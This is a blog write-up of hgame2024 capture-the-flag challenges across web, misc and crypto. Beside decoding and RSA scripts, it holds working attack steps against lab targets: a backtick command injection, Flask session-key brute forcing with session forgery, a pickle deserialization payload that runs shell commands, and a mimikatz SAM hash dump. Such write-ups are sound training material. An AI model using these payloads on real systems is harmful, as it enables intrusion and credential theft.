hgame2024

week1

web

ezHTTP

1
2
3
4
5
6
7
8
9
10
11
GET / HTTP/1.1
Host: 139.196.200.143:32581
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/5.0 (Vidar; VidarOS x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Real-IP:127.0.0.1
Referer:vidar.club
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

返回包

1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJGMTRnIjoiaGdhbWV7SFRUUF8hc18xbVAwclQ0bnR9In0.VKMdRQllG61JTReFhmbcfIdq7MvJDncYpjaT7zttEDc

https://jwt.io/decode
hgame{HTTP_!s_1mP0rT4nt}

Bypass it

访问注册时设置了js重定向
把浏览器js关掉注册登录即可
https://chromewebstore.google.com/detail/disable-javascript/jfpdlihdedhlmhlbgooailmfhahieoem?hl=zh-CN&utm_source=ext_sidebarDisable JavaScript 插件

Select Courses

选课时发送id到api,发现时不时会有课有空位,写脚本抢即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import time

url = 'http://47.100.245.185:31531/api/courses'
headers = {'Content-Type': 'application/json'}

# 循环发送ID 1-5
for id in range(1, 6):  # 发送ID 1-5
    data = '{"id":%d}' % id
    while True:
        r = requests.post(url, data=data, headers=headers)
        # 打印响应内容
        print(r.text)
        time.sleep(2)  # 等待2秒

        # 检查响应中是否包含'"full":0'
        if '"full":0' in r.text:
            break
        elif '"full":1' in r.text:
            continue

2048*16

在js里找到:
messageITMCnzbCn5eFIC=6yliXfzN=I5NMnz0XIC==yzycysi70ci7y7iK
game-won表: V+g5LpoEej/fy0nPNivz9SswHIhGaDOmU8CuXb72dB1xYMrZFRAl=QcTq6JkWK4t3
https://ctf.mzy0.com/CyberChef3/#recipe=From_Base64%EF%BC%88Base64%E8%BD%AC%E6%8D%A2%EF%BC%89(‘V%2Bg5LpoEej/fy0nPNivz9SswHIhGaDOmU8CuXb72dB1xYMrZFRAl%3DQcTq6JkWK4t3’,true)&input=SVRNQ256YkNuNWVGSUM9NnlsaVhmek49STVOTW56MFhJQz09eXp5Y3lzaTcwY2k3eTdpSw
flag{b99b820f-934d-44d4-93df-41361df7df2d}

misc

SignIn

hgame{WOW_GREAT_YOU_SEE_IT_WONDERFUL}

希儿希儿希尔

看题目猜到是希尔密码

foremost分离
CVOCRJGMKLDJGBQIUIVXHEYLPNWR

hgame{DISAPPEARINTHESEAOFBUTTERFLY}

simple_attack


https://tool.jisuapi.com/base642pic.html
**hgame{s1mple_attack_for_zip}**

来自星尘的问候



https://my1l.github.io/Ctrl/CtrlAstr.html
**hgame{welc0me!}**

crypto

ezRSA

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import *
import gmpy2
p = 149127170073611271968182576751290331559018441805725310426095412837589227670757540743929865853650399839102838431507200744724939659463200158012469676979987696419050900842798225665861812331113632892438742724202916416060266581590169063867688299288985734104127632232175657352697898383441323477450658179727728908669
q = 116122992714670915381309916967490436489020001172880644167179915467021794892927977272080596641785569119134259037522388335198043152206150259103485574558816424740204736215551933482583941959994625356581201054534529395781744338631021423703171146456663432955843598548122593308782245220792018716508538497402576709461
c = 10529481867532520034258056773864074017027019578041866245400647840230251661652999709715919620810933437191661180003295923273655675729588558899592524235622728816065501918076120812236580344991140980991532347991252705288633014913479970610056845543523591324177567061948922552275235486615514913932125436543991642607028689762693617305246716492783116813070355512606971626645594961850567586340389705821314842096465631886812281289843132258131809773797777049358789182212570606252509790830994263132020094153646296793522975632191912463919898988349282284972919932761952603379733234575351624039162440021940592552768579639977713099971

n=p*q
phi=(p-1)*(q-1)
e=0x10001
d=gmpy2.invert(e,phi)

m= pow(c,d,n)
print(long_to_bytes(m))

week2

misc

ek1ng_want_girlfriend

追踪 tcp.stream eq 0
提取hexdump jpg
hgame{ek1ng_want_girlfriend_qq_761042182}

ezWord

改为zip
word\media
恭喜你找到了这些东西,现在你离flag只差解开这个新的压缩包,然后对压缩包里的东西进行两层解密就能获得flag了。压缩包的密码和我放在这的两张图片有关。


T1hi3sI4sKey
你好,很高兴你看到了这个压缩包。请注意:这个压缩包的密码有11位数而且包含大写字母小写字母和数字。还有一个要注意的是,里面的这一堆英文decode之后看上去是一堆中文乱码实际上这是正常现象,如果看到它们那么你就离成功只差一步了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But don't believe
us . Ms Simpson who resides in Maine tried us and says
"I've been poor and I've been rich - rich is better"
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and you'll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson of Illinois tried
us and says "Now I'm rich many more things are possible"
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more & SELL MORE . You can begin
at absolutely no cost to you . But don't believe us
. Mr Jones of Minnesota tried us and says "I was skeptical
but it worked for me" ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and you'll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customer's
doorstep & turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But don't
believe us . Ms Anderson who resides in New York tried
us and says "My only problem now is where to park all
my cars" ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and you'll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But don't
believe us . Mrs Anderson of Indiana tried us and says
"Now I'm rich, Rich, RICH" . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customer's doorstep
. You can begin at absolutely no cost to you . But
don't believe us ! Mrs Simpson of Illinois tried us
and says "I was skeptical but it worked for me" . We
are licensed to operate in all states ! Because the
Internet operates on "Internet time" you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But don't believe us ! Mrs Anderson who
resides in Alabama tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
, Title 4 , Section 308 . THIS IS NOT MULTI-LEVEL MARKETING
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it & nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But don't
believe us ! Prof Ames who resides in Washington tried
us and says "I was skeptical but it worked for me"
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and you'll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills & people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS & SELL MORE . You can begin at absolutely
no cost to you ! But don't believe us . Mr Ames of
Louisiana tried us and says "Now I'm rich, Rich, RICH"
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and you'll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .

https://www.spammimic.com/decode.cgi

1
籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆

转unicode

1
籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆

取后两位数字

1
71 70 6a 76 6e 84 39 74 68 82 78 7e 68 7c 39 75 7f 6e 68 6a 75 3a 68 7d 71 3c 68 7c 6e 6c 7b 3c 7d 86 
1
2
3
4
a = '71 70 6a 76 6e 84 39 74 68 82 78 7e 68 7c 39 75 7f 6e 68 6a 75 3a 68 7d 71 3c 68 7c 6e 6c 7b 3c 7d 86 '
for i in a.split(' '):
    print(chr(int(i,16)-9),end='')
#hgame{0k_you_s0lve_al1_th3_secr3t}

龙之舞

频谱图上下镜像翻转

5H8w1nlWCX3hQLG
deepsound
得到gif,分离出4部分二维码然后拼接
https://merri.cx/qrazybox/
用tools的模块

crypto

midRSA

把flag泄露出来了

1
2
3
4
5
from Crypto.Util.number import *

a= 13292147408567087351580732082961640130543313742210409432471625281702327748963274496942276607
print(long_to_bytes(a))
#b'hgame{0ther_cas3s_0f_c0ppr3smith}\xff\xff\xff\xff\xff'

backpack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from Crypto.Util.number import long_to_bytes

enc = 871114172567853490297478570113449366988793760172844644007566824913350088148162949968812541218339
a = [3245882327, 3130355629, 2432460301, 3249504299, 3762436129, 3056281051, 3484499099, 2830291609, 3349739489, 2847095593, 3532332619, 2406839203, 4056647633, 3204059951, 3795219419, 3240880339, 2668368499, 4227862747, 2939444527, 3375243559]
bag = 45893025064

# Reconstruct p
p = 0
for prime in a:
    if bag % prime == 0:
        p |= 1
    p <<= 1
    bag //= prime

p >>= 1  # Remove the extra left shift at the end of the loop

# Decrypt the ciphertext
dec = enc ^ p

flag = long_to_bytes(dec)
print(flag)
#hgame{M@ster_0f ba3kpack_m4nag3ment!}

web

What the cow say?

可以命令执行
fuzz一下,可以用反引号和print

1
print `ls /`

flag在flag_is_here/flag_c0w54y
过滤了flag

1
print `/f*/f*`

myflask

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data=base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata=pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'
 
if __name__=='__main__':
    app.run(debug=True, host="0.0.0.0")

看源码一目了然就是session伪造加pickle反序列化
session的key为当前时间app.config['SECRET_KEY'] = currentTime
靶机开启时脚本运行key就被创建,以靶机创建时间为key
看开靶机时的大概时间,如23:56:则前后试试
也可以用flask-unsign直接爆破
GitHub下载源码然后python setup.py install
生成字典

1
2
3
4
5
6
7
8
9
10
11
# 打开文件准备写入
with open('1.txt', 'w') as file:
    # 循环生成密码
    for number in range(1000000):
        # 生成6位随机数,不足前面补0
        password = format(number, '06d')
        # 将密码写入文件
        file.write(password + '\n')

print("密码生成完成。")

flask-unsign --unsign --cookie 'eyJ1c2VybmFtZSI6Imd1ZXN0In0.Zc40VA.I1YZ3EhqqmkBJpga_wgyLGYS7UI' --no-literal-eval --wordlist 1.txt

235654
或者手打

然后用伪造的session

然后报错构造反序列化,要在linux跑

1
2
3
4
5
6
7
8
9
10
import pickle
import base64
class A(object):
	def __reduce__(self):
		return (exec,("raise Exception(__import__('os').popen('tac /flag').read())",))
a=A()
test=pickle.dumps(a)
print(base64.b64encode(test))
#b'gASVVwAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIw7cmFpc2UgRXhjZXB0aW9uKF9faW1wb3J0X18oJ29zJykucG9wZW4oJ3RhYyAvZmxhZycpLnJlYWQoKSmUhZRSlC4='

week3

misc

与ai聊天

Blind SQL Injection

手搓,注意63前面的那一个payload就行
[https://ctf.mzy0.com/CyberChef3/#recipe=From_Decimal%EF%BC%8810%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2%EF%BC%89('Space',false)Reverse('Character')&input=MTI1IDEwMiA1MCAxMDIgOTcgNTYgNTAgNTcgNTMgOTkgNTYgNTEgMTAwIDQ1IDU0IDk5IDk3IDk4IDQ1IDU2IDU3IDEwMSA1MiA0NSA1MyA1MCA1NSA0OSA0NSA1NSAxMDEgMTAyIDk3IDk4IDk3IDk4IDk5IDEyMyAxMDMgOTcgMTA4IDEwMiA0NCA](https://ctf.mzy0.com/CyberChef3/#recipe=From_Decimal%EF%BC%8810%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2%EF%BC%89('Space',false)Reverse('Character')&input=MTI1IDEwMiA1MCAxMDIgOTcgNTYgNTAgNTcgNTMgOTkgNTYgNTEgMTAwIDQ1IDU0IDk5IDk3IDk4IDQ1IDU2IDU3IDEwMSA1MiA0NSA1MyA1MCA1NSA0OSA0NSA1NSAxMDEgMTAyIDk3IDk4IDk3IDk4IDk5IDEyMyAxMDMgOTcgMTA4IDEwMiA0NCA)
flag{cbabafe7-1725-4e98-bac6-d38c5928af2f}

简单的取证,不过前十个有红包

在另一个题的vmdk文件
7z解压
Documents and Settings\Administrator\桌面找到密钥图片
968fJD17UBzZG6e3yjF6
挂载vc得到hgame{happy_new_year_her3_1s_a_redbag_key_41342177}

简单的vmdk取证

找到sam和system文件
保存为sam.hivsystem.hiv
lsadump::sam /sam:sam /system:system

解md5为Admin1234
hgame{DAC3A2930FC196001F3AEAB959748448_Admin1234}

CTF > 比赛Write Up
#比赛Write Up
hgame2024
http://example.com/2024/02/16/hgame2024/
作者
J_0k3r
发布于
2024年2月16日
许可协议
BY J_0K3R